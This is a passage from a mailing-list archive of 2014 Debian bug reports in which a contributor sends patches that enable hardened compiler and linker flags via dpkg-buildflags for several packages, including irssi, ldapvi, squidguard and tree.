nARIM9pqbsYBDAKDWjXfIka5iKIguLVhk7jktg75GiWU4ClcGE9VwyYqmMcQTeHp
NjIKriPuPy1MXfiCNVZMqOhQMhcKuYROTBvsknL8TSARuzCQhCUbngEkaDaowFT2
VFyB5GM2D5cLR6U/e8Yg6qyvIudvgTllm/BPI7XDKJ3r0u7uI768svJFB+aMPiJg
04t3BZzoeCCODtx/obE9nHuzHJDfp5gos+PAplUP0xqdksdt3Fd4hIUmaTYYSqaG
HfM8NXM7YUHIbapbZOFdQ7qGrbKwzNTB921R8/srYlVmOAXr58Z/l1HuCvmTm0Pp
G491jTPJwrRwGG5DwJI8
=R9QO
-END PGP SIGNATURE-
diff -u ifplugd-0.28/debian/changelog ifplugd-0.28/debian/changelog
--- ifplugd-0.28/debian/changelog
+++ ifplugd-0.28/debian/changelog
@@ -1,3 +1,10 @@
+ifplugd (0.28-19.1) unstable; urgency=medium
+
+  * Non-maintainer upload.
+  * Use dpkg-buildflags and pass *FLAGS to configure
+
+ -- Guillaume Delacour g...@iroqwa.org  Sun, 21 Sep 2014 10:09:39 +0200
+
 ifplugd (0.28-19) unstable; urgency=low
 
   * Added interface poll delay  1sec using the new -T option. (Closes:
diff -u ifplugd-0.28/debian/rules ifplugd-0.28/debian/rules
--- ifplugd-0.28/debian/rules
+++ ifplugd-0.28/debian/rules
@@ -4,19 +4,14 @@
 #export DH_VERBOSE=1
 
 include /usr/share/dpatch/dpatch.make
+DPKG_EXPORT_BUILDFLAGS = 1
+include /usr/share/dpkg/buildflags.mk
 
 # These are used for cross-compiling and for saving the configure script
 # from having to guess our platform (since we know it already)
 DEB_HOST_GNU_TYPE   ?= $(shell dpkg-architecture -qDEB_HOST_GNU_TYPE)
 DEB_BUILD_GNU_TYPE  ?= $(shell dpkg-architecture -qDEB_BUILD_GNU_TYPE)
 
-CFLAGS = -Wall -g
-
-ifneq (,$(findstring noopt,$(DEB_BUILD_OPTIONS)))
-	CFLAGS += -O0
-else
-	CFLAGS += -O2
-endif
 ifeq (,$(findstring nostrip,$(DEB_BUILD_OPTIONS)))
 	INSTALL_PROGRAM += -s
 endif
@@ -36,7 +31,7 @@
 	cp -f /usr/share/misc/config.guess config.guess
 endif
 	[ ! -f doc/README.html ] || mv -f doc/README.html doc/README.html.ups
-	./configure --host=$(DEB_HOST_GNU_TYPE) --build=$(DEB_BUILD_GNU_TYPE) --prefix=/usr --mandir=\$${prefix}/share/man --sysconfdir=/etc CFLAGS=$(CFLAGS) LDFLAGS=-Wl,-z,defs $(confopts)
+	./configure --host=$(DEB_HOST_GNU_TYPE) --build=$(DEB_BUILD_GNU_TYPE) --prefix=/usr --mandir=\$${prefix}/share/man --sysconfdir=/etc CFLAGS=$(CFLAGS) CPPFLAGS=$(CPPFLAGS) LDFLAGS=$(LDFLAGS) -Wl,-z,defs $(confopts)
 	touch $@
 
 build: build-stamp

Bug#762336: Please enable hardened build flags

2014-09-21 Thread Guillaume Delacour 
Source: bandwidthd
Version: 2.0.1+cvs20090917-7
Severity: important
Tags: patch
User: hardening-disc...@lists.alioth.debian.org
Usertags: goal-hardening

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256



Hello,

Please enable hardened build flags with dpkg-buildflags (patch
attached). dpkg-buildflags handle noopt from DEB_BUILD_OPTIONS.

-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQIcBAEBCAAGBQJUHpHRAAoJEJmGUYuaqqClNhQP/jYNArIMFtGuoXbnZ5dS54p+
WjybNeG948asYMeLoDT86QRYl/RYiprPqXy1dNf5/zV8qoTX5i+S39X49sKbfRQE
HIEzsJOqp/+PPKK0fBZ7Yf+ScTiQMiJAnvaxTtfy6kiP++OLXl/J+Zzw0AsusEwH
wGe9i+zMFuH0yEB5qr9Pst2foiPmXmK+gE7mtEe4AGdTPKRFcg9JW5TZsL8b5MFC
6PxA5LnOP2MyAoxpDJKiAFS775/fihBY2ppUz86oEh1JnjX9WFsdy5QrWqoo8LfG
trc9eUSIysksjSL79akyUikia6AOQr0NxxO6LDdQIjMXVgin4BcfW9pi/g5a9A4g
XU4Na6H9viLfs/y5bnfHnhl5uhygy3OVWpgh+1KvdwCzWA2PBnu0zjJ+zAo8bdSb
+rg5LK4KsxrLlHEsVrBud6pigLuEPxfEIXrlqlEcSwOtkCJF2E7OiaUtCZ/Ry6jI
tNVFqp21C3q6ppP31QF4VJFGga4OoLdw5cQhpfA8ARiwewrcurxy3qan3Ge8khVe
SMyzaKEipSehDxyySKL/5zgiXyOWTDro5Sbal+GI3LHApxMD4TlQv8YEMpKF3OuX
ccQ9khGMrdD+PRJGjEmYJKVByPK+pokcTrkk9YIQLBwuy/YIuW9obLjXWV+KMGEA
azkJz++xs3S+l314ZhUP
=Prxd
-END PGP SIGNATURE-
diff -Nru bandwidthd-2.0.1+cvs20090917/debian/changelog bandwidthd-2.0.1+cvs20090917/debian/changelog
--- bandwidthd-2.0.1+cvs20090917/debian/changelog	2013-07-20 18:25:40.0 +0200
+++ bandwidthd-2.0.1+cvs20090917/debian/changelog	2014-09-21 10:39:48.0 +0200
@@ -1,3 +1,10 @@
+bandwidthd (2.0.1+cvs20090917-7.1) unstable; urgency=medium
+
+  * Non-maintainer upload.
+  * Use dpkg-buildflags and pass *FLAGS to configure
+
+ -- Guillaume Delacour g...@iroqwa.org  Sun, 21 Sep 2014 10:27:23 +0200
+
 bandwidthd (2.0.1+cvs20090917-7) unstable; urgency=low
 
   * Move php5-gd to Recommends and also recommend php5 (Closes: #717042)
diff -Nru bandwidthd-2.0.1+cvs20090917/debian/rules bandwidthd-2.0.1+cvs20090917/debian/rules
--- bandwidthd-2.0.1+cvs20090917/debian/rules	2013-06-14 00:41:25.0 +0200
+++ bandwidthd-2.0.1+cvs20090917/debian/rules	2014-09-21 10:28:19.0 +0200
@@ -6,6 +6,9 @@
 # Uncomment this to turn on verbose mode.
 #export DH_VERBOSE=1
 
+DPKG_EXPORT_BUILDFLAGS = 1
+include /usr/share/dpkg/buildflags.mk
+
 configureoptions = --prefix=/usr --bindir=/usr/sbin/ --sysconfdir=/etc/bandwidthd/ --localstatedir=/var/lib/
 
 p_bwdstatic = bandwidthd
@@ -15,17 +18,6 @@
 build_bwdpgsql = debian/bandwidthd-pgsql
 
 
-CFLAGS = -Wall
-
-ifneq (,$(findstring debug,$(DEB_BUILD_OPTIONS)))
-	CFLAGS += -g
-endif
-
-ifneq (,$(findstring noopt,$(DEB_BUILD_OPTIONS)))
-	CFLAGS += -O0
-else
-	CFLAGS += -O2
-endif
 ifeq (,$(findstring nostrip,$(DEB_BUILD_OPTIONS)))
 	INSTALL_PROGRAM += -s
 endif
@@ -41,7 +33,7 @@
 	cp -f /usr/share/misc/config.sub config.sub
 	dh_autoreconf
 	chmod +x configure
-	./configure $(configureoptions) --disable-pgsql
+	$(shell dpkg-buildflags --export=cmdline) ./configure $(configureoptions) --disable-pgsql
 	touch $@
 	
 configure-bwdpgsql: configure-bwdpgsql-stamp

Bug#762336: Please enable hardened build flags

2014-09-21 Thread Guillaume Delacour 
Le dimanche 21 septembre 2014 à 16:11 +0200, Andreas Henriksson a
écrit :
 Hello Guillaume Delacour!

 Thanks for your patch. Have you tested it?
 Are you sure it doesn't break things?
 
 Too many times have I been asked to enable hardening build
 and then again having to re-disable it again because the
 submitter didn't test things at all and when problems showed
 up the submitter went into hiding

I don't use bandwidthd personally, so i've just installed the generated
deb with hardened flags, started the daemon, let the default
configuration and wait a few minutes to see a first graph with a values.
It maybe need a more long test campain to be sure everything is ok (my
desktop only have one eth0 interface). I didn't see any similar issue
reported before for bandwidthd (and the fix is simple to implement),
this is why i've opened this bug.

 
 Regards,
 Andreas Henriksson

-- 
Guillaume Delacour g...@iroqwa.org


signature.asc
Description: This is a digitally signed message part

Bug#761123: Please enable hardened build flags

2014-09-10 Thread Guillaume Delacour 
Source: irssi
Version: 0.8.16
Severity: important
Tags: patch
User: hardening-disc...@lists.alioth.debian.org

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Hello,

Please enable hardened build flags with dpkg-buildflags (patch
attached). dpkg-buildflags handle noopt from DEB_BUILD_OPTIONS.

-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQIcBAEBCAAGBQJUELfFAAoJEJmGUYuaqqClxlUP/AhJ2TmioMRwSpWIhDw6VnVE
pl5UTTj/ADAdophobeUrUjpUStakl6f5pDOHa9xJV/t5RQ3F91be46lFGfTOF3FL
8sVibOSVdbjsz8fq7oPn48dlJz2JV3L5lne3+nHm8vt2fw/BMbvRymLISIo1zPky
F/ui6WGsi0d1VzaO/zIG7UWbXAduNZSRUfItLxIrxRXrgG2RohQP9pP8zPG6GXWw
QWV3NBMLUmMPBSJdI6/GcEuJw9fxigmB1Jey4uuFJ+AM/VSk7gSC+cAIWyQeeuJG
FYoSNNu21qnfuFi5hamr/mlTDtKRr0T1NO3hwNTz6lKNXs/hIlatbJlFmWL0FvCp
m6YERrq6jGzH1r8moD+s1R2rEqeFQfKyoMXl056Azmh/wnAdTE32vTRidU6ThZPK
0nxGBI6zoDcSyXLDF6BDVYKaXnOAE1RpCGCBNsSbOvSy4K4xyESSlMhsxtcO3Vbr
8Uc+Ys5VtyZeU13wNu3fMzoPYosegjuEcLt4SsKS0C5qR465t3ZqBgAOao5OAxIp
JGFfy8tYc2/n283ibfIermY1hQi5HBNwieseFlk7t5WJ+ETlcu7EI58WMzQNkz8q
R+98X6XJX/W14JwSBscDHscdIg7JnCTGk2lUE66HCRaoF8QYs/d8cpZ4T11WIr22
zorX20wjsoB1qBWvDcex
=jRwL
-END PGP SIGNATURE-
diff -u irssi-0.8.16/debian/rules irssi-0.8.16/debian/rules
--- irssi-0.8.16/debian/rules
+++ irssi-0.8.16/debian/rules
@@ -10,6 +10,8 @@
 #export DH_VERBOSE=1
 
 include /usr/share/quilt/quilt.make
+DPKG_EXPORT_BUILDFLAGS = 1
+include /usr/share/dpkg/buildflags.mk
 
 # These are used for cross-compiling and for saving the configure script
 # from having to guess our platform (since we know it already)
@@ -24,18 +26,6 @@
 MAKEFLAGS += -j$(NUMJOBS)
 endif
 
-
-
-
-CFLAGS = -Wall -g
-
-ifneq (,$(findstring noopt,$(DEB_BUILD_OPTIONS)))
-	CFLAGS += -O0
-else
-	CFLAGS += -O2
-endif
-
-
 CONFIGURE_SWITCHES = --host=$(DEB_HOST_GNU_TYPE) --build=$(DEB_BUILD_GNU_TYPE) \
 	 --prefix=/usr --mandir=\$${prefix}/share/man --infodir=\$${prefix}/share/info \
 	 --sysconfdir=/etc \
@@ -50,7 +40,7 @@
 	dh_testdir
 	# Add here commands to configure the package.
 	dh_autotools-dev_updateconfig
-	CFLAGS=$(CFLAGS) ./configure $(CONFIGURE_SWITCHES)
+	$(shell dpkg-buildflags --export=cmdline) ./configure $(CONFIGURE_SWITCHES)
 
 
 build: build-arch build-indep

Bug#761127: Please enable hardened build flags

2014-09-10 Thread Guillaume Delacour 
Package: heirloom-mailx
Version: 12.5-2
Severity: important
Tags: patch
User: hardening-disc...@lists.alioth.debian.org
Usertags: goal-hardening

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256


Please enable hardened build flags with dpkg-buildflags (patch
attached). dpkg-buildflags handle noopt from DEB_BUILD_OPTIONS.

-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQIcBAEBCAAGBQJUEMOOAAoJEJmGUYuaqqClvOsP/Rzz/fXy1M8CfhBNT/zMwr43
Vc1F5mBtvxbDZhKtkq0G7CGkmuYysqeVIN7CcK62rBn+nRNTglDsbj3HUfW09dxL
Itf1uX6/KMowBecRt0BcjgVdCtIjt+lAqGbWsQXddJ4t3DEyLZzD11/gFyeLihZy
53zRjZ/5xn8vUPPAOMrS8QIuzxmH6xYRjRvwqWcZDfwstdPGCqrIPBhRGZ3sxEjF
SkiiFreA/KUQptDB4PwZaOp22c2OfsqPpKmODJ5OHT/Yi5HiBqzG+IbP989ql3P0
fT35w4wgOPdnMsL3HVeGPJ1fB0tKKo9RqMNzoW0ePw1rfqoGDvMdyUrzuFUTHj2d
+XDZhG5iLeqvew1r9kyp70skkpR6lz5zELQFkd2jmNEhG4cMC3VhDO1tjWXc/jZ5
9BL/w69ctMLTtj9vRvNv2Iv9I+8MmAUjWIIFRsrSM55r3hipsKr3Tn3sT0jF6pFQ
g6VGgueugxE5ZYhcm5FKx5wE4go3I1PA82LfMDX5Sle+mWN84Ri/5AHCCVUzyZdd
E1EvD681dThZ9WSye6Ba5tEFIDA/5emlvf7W9nj8Y1Wv7xCcB2iCIIHUT4VFALuv
u7CzTyswOjWWAFLbM8WZZ+75YRKPg6I4Kw7TGud7mQnzkjN7yhjOqZestC4XsSs0
F/DzETpQGwvHcV8JrxXF
=uy6g
-END PGP SIGNATURE-
diff -Nru heirloom-mailx-12.5/debian/changelog heirloom-mailx-12.5/debian/changelog
--- heirloom-mailx-12.5/debian/changelog	2012-04-14 20:25:21.0 +0200
+++ heirloom-mailx-12.5/debian/changelog	2014-09-10 23:25:46.0 +0200
@@ -1,3 +1,10 @@
+heirloom-mailx (12.5-2.1) unstable; urgency=medium
+
+  * Non-maintainer upload.
+  * Use dpkg-buildflags and pass *FLAGS to Makefile
+
+ -- Guillaume Delacour g...@iroqwa.org  Wed, 10 Sep 2014 23:16:59 +0200
+
 heirloom-mailx (12.5-2) unstable; urgency=low
 
   * now Provides: mail-reader (Closes: #663384), imap-client
diff -Nru heirloom-mailx-12.5/debian/rules heirloom-mailx-12.5/debian/rules
--- heirloom-mailx-12.5/debian/rules	2012-04-14 20:21:44.0 +0200
+++ heirloom-mailx-12.5/debian/rules	2014-09-10 23:24:08.0 +0200
@@ -5,13 +5,10 @@
 # Uncomment this to turn on verbose mode.
 #export DH_VERBOSE=1
 
-CFLAGS=-Wall -g
-
-ifneq (,$(findstring noopt,$(DEB_BUILD_OPTIONS)))
-	CFLAGS+=-O0
-else
-	CFLAGS+=-O2
-endif
+CPPFLAGS=$(shell dpkg-buildflags --get CPPFLAGS)
+CFLAGS=$(shell dpkg-buildflags --get CFLAGS)
+CFLAGS+=-Wall
+LDFLAGS=$(shell dpkg-buildflags --get LDFLAGS)
 
 build: build-arch build-indep
 build-arch: build-stamp
@@ -22,7 +19,8 @@
 	$(MAKE) \
 		PREFIX=/usr \
 		CFLAGS=$(CFLAGS) \
-		CPPFLAGS=-D_GNU_SOURCE \
+		CPPFLAGS=$(CPPFLAGS) -D_GNU_SOURCE \
+		LDFLAGS=$(LDFLAGS) \
 		UCBINSTALL=/usr/bin/install \
 		IPv6=-DHAVE_IPv6_FUNCS \
 		STRIP=true

Bug#761129: Please enable hardened build flags

2014-09-10 Thread Guillaume Delacour 
Package: ldapvi
Version: 1.7-9
Severity: important
Tags: patch
User: hardening-disc...@lists.alioth.debian.org
Usertags: goal-hardening

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256


Hello,

Please enable hardened build flags with dpkg-buildflags (patch
attached). dpkg-buildflags handle noopt from DEB_BUILD_OPTIONS.

-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQIcBAEBCAAGBQJUEMjIAAoJEJmGUYuaqqClMQsP/0FpUBQ9i8mUnuCEj7ahucsc
+CY+8g9OseRjGZd5fIroePSbJOsGTsxIzz/ZsWNPqrN5xl7pLjZCGXV5t/8WBnWS
Yq+o00gdIbWgP7sr1kJ/J0DJLieOyL8gGtwl7pO7KYov3bCq6AToRNE9KB6ubFBz
Geg3uD0sHrzAcjRkq0trDowa4xIzZ8+3Sk0+/UTqgIkXykX8W6/GzSUbzrQlWOUN
VQY4x5jd/mxUCCaQPvCdBkBmMvvB8Nhlp5TwZSGQ83jRM+mDxLEtZ0TPtniDHMtE
1o17PtsvLqOW3/1fnKq4/B7W3xgLnJ4yGKwCl/EfHOUDz2uF8KRbdJ6KPjK70BHB
wWghZtnSy6qjXFwTgBNIH1xHWxZ0HqY7Rlrki1R+c1kCqFW2PaaW9514hpbOdW/+
ntMmuKtcybDEonah9aAyRxpMuZoWw+49KOF6rChbgSTXKRvWwWkabR0X+/xcevAS
Vc9n4+F/Dt5aqu3xImIXwgwqzeSWVhenY6DpTF29o+cxh+pR53GQc5ZUGp1lanhE
hqhMR8ruRbzjZNG5yEvv1z62IRwa8PUKp1VrAizUOfVkFmyiBAYFetmtH1zFSiAa
VygyfzraeKxnNA5xyKhILLfgHcIHGmRAgcGcA14PqcYhV7QLAqSAlUMBREV4d9U/
93y8L0e1B3NkqBvvIkk8
=qjhd
-END PGP SIGNATURE-
diff -u ldapvi-1.7/debian/changelog ldapvi-1.7/debian/changelog
--- ldapvi-1.7/debian/changelog
+++ ldapvi-1.7/debian/changelog
@@ -1,3 +1,11 @@
+ldapvi (1.7-9.1) unstable; urgency=medium
+
+  * Non-maintainer upload.
+  * Use dpkg-buildflags and pass *FLAGS to configure
+  * Remove compilation generated files (config.status, GNUmakefile, config.h)
+
+ -- Guillaume Delacour g...@iroqwa.org  Wed, 10 Sep 2014 23:40:05 +0200
+
 ldapvi (1.7-9) unstable; urgency=low
 
   * Use fileencoding instead of encoding in vim modeline which makes recent
diff -u ldapvi-1.7/debian/rules ldapvi-1.7/debian/rules
--- ldapvi-1.7/debian/rules
+++ ldapvi-1.7/debian/rules
@@ -11,17 +11,15 @@
 DEB_HOST_GNU_TYPE   ?= $(shell dpkg-architecture -qDEB_HOST_GNU_TYPE)
 DEB_BUILD_GNU_TYPE  ?= $(shell dpkg-architecture -qDEB_BUILD_GNU_TYPE)
 
-CFLAGS = -Wall -g
+CFLAGS=$(shell dpkg-buildflags --get CFLAGS)
+CFLAGS += -Wall
+CPPFLAGS=$(shell dpkg-buildflags --get CPPFLAGS)
+LDFLAGS=$(shell dpkg-buildflags --get LDFLAGS)
 INSTALL = install
 INSTALL_FILE= $(INSTALL) -p-oroot -groot -m644
 INSTALL_PROGRAM = $(INSTALL) -p-oroot -groot -m755
 INSTALL_SCRIPT  = $(INSTALL) -p-oroot -groot -m755
 INSTALL_DIR = $(INSTALL) -p -d -oroot -groot -m755
-ifneq (,$(filter noopt,$(DEB_BUILD_OPTIONS)))
-	CFLAGS += -O0
-else
-	CFLAGS += -O2
-endif
 ifeq (,$(filter nostrip,$(DEB_BUILD_OPTIONS)))
 	INSTALL_PROGRAM += -s
 	STRIP = true
@@ -47,12 +45,14 @@
 	cp -a configure configure.save
 	[ ! -f Makefile ] || $(MAKE) distclean
 	mv configure.save configure
+	# Remove compilation generated files
+	rm -f config.status GNUmakefile config.h
 
 
 build: build-stamp
 build-stamp: patch-stamp
 	$(checkdir)
-	CFLAGS=$(CFLAGS) ./configure --host=$(DEB_HOST_GNU_TYPE) --build=$(DEB_BUILD_GNU_TYPE) --prefix=/usr --mandir=\$${prefix}/share/man --infodir=\$${prefix}/share/info --with-libcrypto=none
+	CFLAGS=$(CFLAGS) CPPFLAGS=$(CPPFLAGS) LDFLAGS=$(LDFLAGS) ./configure --host=$(DEB_HOST_GNU_TYPE) --build=$(DEB_BUILD_GNU_TYPE) --prefix=/usr --mandir=\$${prefix}/share/man --infodir=\$${prefix}/share/info --with-libcrypto=none
 	$(MAKE)
 	cd manual  $(MAKE) manual.html
 	touch build-stamp

Bug#761133: Hardening options incomplete (LDFLAGS)

2014-09-10 Thread Guillaume Delacour 
Source: log4cplus
Version: 1.0.4-1.1
Severity: important
Tags: patch
User: hardening-disc...@lists.alioth.debian.org
Usertags: goal-hardening

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256


Hello,

As you define LDFLAGS, the default exported LDFLAGS is missing (relro).
I also enable parallel build to speed up when you have more than one
cpu.

-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQIcBAEBCAAGBQJUEM9JAAoJEJmGUYuaqqClG/AP/1PK+oMCSXt2y91h+Fpd+0OY
LDYbmHJjOTiYWeOm2Mbs9j4ByP1/0Er+tKWKwewI332yiRDeykSfsKK5vEERUXQD
dbC3ChDOPL1m+AZdEP5y9dvFWv/2UiiNn761hU/TcaHI1pLX6fk+yyE9Ozpdud1T
wnqCmX51cQua/lwRlckIeJGBcexX3Lq/n0ROLFMNP6ekmfImtqPaMoQYuaGnxii7
q7Wa18Fly7EOkbVYRv+jXgCvSDcgTGBQozfAgNEBT/Oi2IZA8z3B2k3DfThHXbpv
jzJDg0xrhAdDH7HepQYVoVI/JWuWXtTjtBL41t4nCpOHtF6fQwix/xGTmo6C4tSV
vFDjMlnVrqbGJLfoJ0CNGj+7HGE4Q4ABPZuAhKN/b3M6zl6oekXkbCN9b8Bsi3wE
bDjUscHRwXWNh72UXb8lAVnB+yztjQgbFcNFlR1OBVwB8kUcTsiqOrJLcl+VTFDz
CaM7HR1hy0TWbG5J8or9rxERhSWBc9YllyNxEWQreDOYQ9B6WTas12XjxpyvspUi
3p8qHSfOTST2yra+6ZQQhkGRZ4WJ4Hr44hNnHa9t+7xWTMSqVe9a2IEjSmjrZxYv
1EDYWeOdWkBKWBDmGecs2tAvwiAqZBDWooAZdaLM4V5uiKJbVtIGphcXzccWnXfq
g+IDMhFTKfLhRZwAeGIU
=YB8x
-END PGP SIGNATURE-
diff -Nru log4cplus-1.0.4/debian/changelog log4cplus-1.0.4/debian/changelog
--- log4cplus-1.0.4/debian/changelog	2014-06-29 08:23:00.0 +0200
+++ log4cplus-1.0.4/debian/changelog	2014-09-11 00:15:39.0 +0200
@@ -1,3 +1,11 @@
+log4cplus (1.0.4-1.2) unstable; urgency=medium
+
+  * Non-maintainer upload.
+  * Use exported LDFLAGS (relro) in DEB_CONFIGURE_SCRIPT_ENV
+  * Enable parallel build
+
+ -- Guillaume Delacour g...@iroqwa.org  Thu, 11 Sep 2014 00:08:42 +0200
+
 log4cplus (1.0.4-1.1) unstable; urgency=low
 
   * Non-maintainer upload.
diff -Nru log4cplus-1.0.4/debian/rules log4cplus-1.0.4/debian/rules
--- log4cplus-1.0.4/debian/rules	2012-01-19 07:26:19.0 +0100
+++ log4cplus-1.0.4/debian/rules	2014-09-11 00:09:50.0 +0200
@@ -8,8 +8,12 @@
 
 #install/liblog4cplus::
 
+ifneq (,$(filter parallel=%,$(DEB_BUILD_OPTIONS)))
+	NUMJOBS = $(patsubst parallel=%,%,$(filter parallel=%,$(DEB_BUILD_OPTIONS)))
+	MAKEFLAGS += -j$(NUMJOBS)
+endif
 
-DEB_CONFIGURE_SCRIPT_ENV += LDFLAGS=-Wl,-z,defs -Wl,--as-needed -lpthread
+DEB_CONFIGURE_SCRIPT_ENV += LDFLAGS=-Wl,-z,defs -Wl,--as-needed -lpthread $(LDFLAGS)
 DEB_DH_INSTALL_SOURCEDIR := debian/tmp
 
 binary-install/liblog4cplus-dev::

Bug#760726: Please enable hardened build flags

2014-09-07 Thread Guillaume Delacour 
Package: squidguard
Version: 1.5-2+b1
Severity: important
Tags: patch
User: hardening-disc...@lists.alioth.debian.org
Usertags: goal-hardening

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Hello,

Please find attached a patch that enable hardening build flags in your
package. The upstream test suite run after the build confirm the good
execution of the binary.


-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQIcBAEBCAAGBQJUDDGnAAoJEJmGUYuaqqClURsP+gMD8tb1Et4Lfq28++EFMXcK
blclzUZAQpaNvjxMEeMEJ9QIUEM4oXcW+EvVdku5ir+CdANBXb00ESmeoqzRnjOC
u/fVcLjrzo4CgaN4nYLWPmVyNz0HGVbuayd6JDoPoHI8I5scGEuVMp0w+TRU8xTB
vwIcZl4H2kyCsiN18oWyD7n/lo1MHFByG2rJ1NIoIDtLm8K4RQAOJr0Lt9D9wsHA
FsHfJSXc6JDPzQ1B++tXqbYU+UbOk8BUB+ZDyowPco3dhv/tEOXeCwy2uNjNSTZY
DsCE3CP9mp5Zg0Z3U7oiwhQHFm0159BRv0PED9QL5zYfeVKmG6lhtnXF3g3LIJD/
4LGamn+Ub/6beph3GM7gpo9s/cJhOEmctKabNBwJZXVGT/NThqoDs6qwgIQohcGm
6W2Ma3Uyl81MboyGFAW/e06fTJGYOa89qpmKDDua/0MG2xJZMlFXu6bRLeQnVF9P
7coN/j5VVbLcP6k1XY8AV5N9RJUxq/aWhEXFXjB7jV7axgM8dWUfLvNKFFc/j4aZ
xUd3fWyWr/HXVf7mRXikvXeMpfQp+wT4+QYoU8ywFIrDUF8MS/SaGHkdOZkQ91Dd
mcDX0ZU/aZAgoLf/lD9Keu9kggq9yhkzLESQVcxuHYQLht0HuR3BQyYLcSIf60HZ
Cns45Y69IiNoX5KR24J3
=M/jO
-END PGP SIGNATURE-
diff -Nru squidguard-1.5/debian/changelog squidguard-1.5/debian/changelog
--- squidguard-1.5/debian/changelog	2014-01-24 21:52:43.0 +0100
+++ squidguard-1.5/debian/changelog	2014-09-07 11:22:24.0 +0200
@@ -1,3 +1,10 @@
+squidguard (1.5-2.1) unstable; urgency=medium
+
+  * Non-maintainer upload.
+  * Pass hardened flags through dpkg-buildflags to configure
+
+ -- Guillaume Delacour g...@iroqwa.org  Sun, 07 Sep 2014 11:21:46 +0200
+
 squidguard (1.5-2) unstable; urgency=low
 
   * Fix small typo in update-squidguard.
diff -Nru squidguard-1.5/debian/rules squidguard-1.5/debian/rules
--- squidguard-1.5/debian/rules	2014-09-07 11:21:09.0 +0200
+++ squidguard-1.5/debian/rules	2014-09-07 11:22:54.0 +0200
@@ -1,11 +1,14 @@
 #!/usr/bin/make -f
 # -*- makefile -*-
 
+export DEB_BUILD_MAINT_OPTIONS = hardening=+all
+
 %:
 	dh $@
 
 override_dh_auto_configure: 
-	dh_auto_configure  -- --with-db=/usr \
+	dh_auto_configure  -- $(shell dpkg-buildflags --export=configure) \
+		--with-db=/usr \
 		--with-ldap=yes --with-ldap-lib=/usr/lib \
 		--with-sg-config=/etc/squidguard/squidGuard.conf \
 		--with-sg-logdir=/var/log/squidguard \

Bug#760749: CPPFLAGS unused

2014-09-07 Thread Guillaume Delacour 
Package: tree
Version: 1.7.0-1
Severity: normal
Tags: patch
User: hardening-disc...@lists.alioth.debian.org
Usertags: goal-hardening

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Hello,

Your package doesn't use CPPFLAGS (as upstream Makefile) at build time.
Please find attached a patch that fix that.


-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQIcBAEBCAAGBQJUDGFnAAoJEJmGUYuaqqCl8kUP/iaTkj++QLOeLQzNe7xykRp9
dY9Zyer+BweOmyOVfRqgCdU+c0G6RuythWFpcb0K6RLxC//theITenLvEJkiyKgU
mfq16CNtITKQ3PKBMu42yIYG2oz74RwGDARWtpaSAW/i+0SZdQLvp/L+U53ZKbUJ
dnsdA63b+ooots7YtXYv+XNYMUx+afb0BxZ6XxXV8L+eKUHMQQrsEVubCGnmPMfB
YeMIcBAH75+1V3gmdgzobkY5/0v9upkkktBEJrkcmDDeJZvfCwxo60iyRXdF99S2
PPQw43zxbQ2f8WSWrkTPEDNeV0HEmgNbQtUzWOq/rqC3Vz69Ie2Ayi304hjv+bUa
AKpT73ZJcukkJd0cjUS7p9jhpZT/z3qdFqLhORKdDTANEQTWWOwFlkbdnWJFBrdA
G2DVb5qSumDwwfsPCFZGPiIq8NFT5PVMpErAKg+GnYWHrVqwZWtNv4VZPNn5YEob
w77fMHFh5YA3TuLPq3meoF0xP8p6D42nm0GpsUoV2mbJP8MZXE4Ky4XKZP9VbW3R
CUc41AouKenzdshXzRT5aYYq3DhZSaHfSCWFu6UlnacUasVDGM5IsCnnnI8NsKzl
b6Ff5lgrNtDzNLgZVrZ3SBKIMIPia/ftTnJNzT++3+9LbAngEh2SbK3DkBMoRl4G
9Ma5dFwjvgjJfxcuMqEq
=siJ/
-END PGP SIGNATURE-
diff -Nru tree-1.7.0/debian/changelog tree-1.7.0/debian/changelog
--- tree-1.7.0/debian/changelog	2014-04-27 10:34:34.0 +0200
+++ tree-1.7.0/debian/changelog	2014-09-07 15:24:21.0 +0200
@@ -1,3 +1,11 @@
+tree (1.7.0-1.1) unstable; urgency=medium
+
+  * Non-maintainer upload.
+  * Pass CPPFLAGS at build time (enable D_FORTIFY_SOURCE), patch upstream Makefile
+  * Remove generated binary in clean
+
+ -- Guillaume Delacour g...@iroqwa.org  Sun, 07 Sep 2014 15:11:27 +0200
+
 tree (1.7.0-1) unstable; urgency=medium
 
   * [63b3dfd] Imported Upstream version 1.7.0 (Closes: #745776)
diff -Nru tree-1.7.0/debian/patches/cppflags.diff tree-1.7.0/debian/patches/cppflags.diff
--- tree-1.7.0/debian/patches/cppflags.diff	1970-01-01 01:00:00.0 +0100
+++ tree-1.7.0/debian/patches/cppflags.diff	2014-09-07 15:18:02.0 +0200
@@ -0,0 +1,17 @@
+Author: Guillaume Delacour g...@iroqwa.org
+Subject: Use CPPFLAGS in upstream Makefile
+Last-Update: 2014-09-07
+
+Index: tree-1.7.0/Makefile
+===
+--- tree-1.7.0.orig/Makefile
 tree-1.7.0/Makefile
+@@ -87,7 +87,7 @@ tree:	$(OBJS)
+ 	$(CC) $(LDFLAGS) -o $(TREE_DEST) $(OBJS)
+ 
+ $(OBJS): %.o:	%.c tree.h
+-	$(CC) $(CFLAGS) -c -o $@ $
++	$(CC) $(CFLAGS) $(CPPFLAGS) -c -o $@ $
+ 
+ clean:
+ 	if [ -x $(TREE_DEST) ]; then rm $(TREE_DEST); fi
diff -Nru tree-1.7.0/debian/patches/series tree-1.7.0/debian/patches/series
--- tree-1.7.0/debian/patches/series	2014-04-27 10:34:34.0 +0200
+++ tree-1.7.0/debian/patches/series	2014-09-07 15:12:45.0 +0200
@@ -1 +1,2 @@
 PATH_MAX
+cppflags.diff
diff -Nru tree-1.7.0/debian/rules tree-1.7.0/debian/rules
--- tree-1.7.0/debian/rules	2014-04-27 10:34:34.0 +0200
